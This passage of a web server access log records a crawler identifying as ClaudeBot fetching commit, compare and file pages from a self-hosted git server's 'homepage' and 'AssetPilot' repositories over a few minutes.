git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.env.local" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?style=unified&whitespace=ignore-all" [Client 216.73.216.188] [Length 82352] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?style=unified&whitespace=ignore-change" [Client 216.73.216.188] [Length 82377] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:58 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.env.local" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 11495] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?style=unified&whitespace=show-all" [Client 216.73.216.188] [Length 82570] [Gzip 10.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-all" [Client 216.73.216.188] [Length 442152] [Gzip 15.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 11501] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2Fbf87175f515287fd25d175843915ffa6178025eb%2F.TemporaryDocument" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?style=unified&whitespace=ignore-eol" [Client 216.73.216.188] [Length 82378] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64?follow_symlink=1" [Client 216.73.216.188] [Length 11057] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?style=unified&whitespace=ignore-change" [Client 216.73.216.188] [Length 398835] [Gzip 13.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?style=unified&whitespace=ignore-all" [Client 216.73.216.188] [Length 398842] [Gzip 13.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fstatic%2Fjs" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 11497] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?style=unified&whitespace=show-all" [Client 216.73.216.188] [Length 398452] [Gzip 13.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?style=unified&whitespace=ignore-eol" [Client 216.73.216.188] [Length 398471] [Gzip 13.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2F1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa%2Fasset_pilot_docker%2F.venv" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py" [Client 216.73.216.188] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/css" [Client 216.73.216.188] [Length 9855] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 10828] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx" [Client 216.73.216.188] [Length 14647] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html?display=rendered" [Client 216.73.216.188] [Length 10879] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html" [Client 216.73.216.188] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md?display=rendered" [Client 216.73.216.188] [Length 11325] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json" [Client 216.73.216.188] [Length 11707] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/package.json?display=rendered" [Client 216.73.216.188] [Length 11120] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json?display=rendered" [Client 216.73.216.188] [Length 10892] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json" [Client 216.73.216.188] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json?display=rendered" [Client 216.73.216.188] [Length 10872] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md?display=rendered" [Client 216.73.216.188] [Length 13342] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html" [Client 216.73.216.188] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10885] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 11496] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json" [Client 216.73.216.188] [Length 11698] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 14298] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2Fstatic%2Fjs" [Client 216.73.216.188] [Length 54111] [Gzip 9.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components" [Client 216.73.216.188] [Length 10604] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py?display=source" [Client 216.73.216.188] [Length 13016] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html?display=rendered" [Client 216.73.216.188] [Length 10921] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/favicon.ico?display=rendered" [Client 216.73.216.188] [Length 10876] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html%2Fassets%2Fcss" [Client 216.73.216.188] [Length 22758] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 11233] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fassets%2Fcss" [Client 216.73.216.188] [Length 24475] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components" [Client 216.73.216.188] [Length 10601] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" [Client 216.73.216.188] [Length 10415] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components" [Client 216.73.216.188] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/css" [Client 216.73.216.188] [Length 9836] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg?display=source" [Client 216.73.216.188] [Length 11261] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg?display=rendered" [Client 216.73.216.188] [Length 10982] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fimport_csv.py" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:21:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-eol" [Client 216.73.216.188] [Length 441679] [Gzip 15.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-change" [Client 216.73.216.188] [Length 442129] [Gzip 15.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json" [Client 216.73.216.188] [Length 11700] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components" [Client 216.73.216.188] [Length 10600] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services" [Client 216.73.216.188] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr 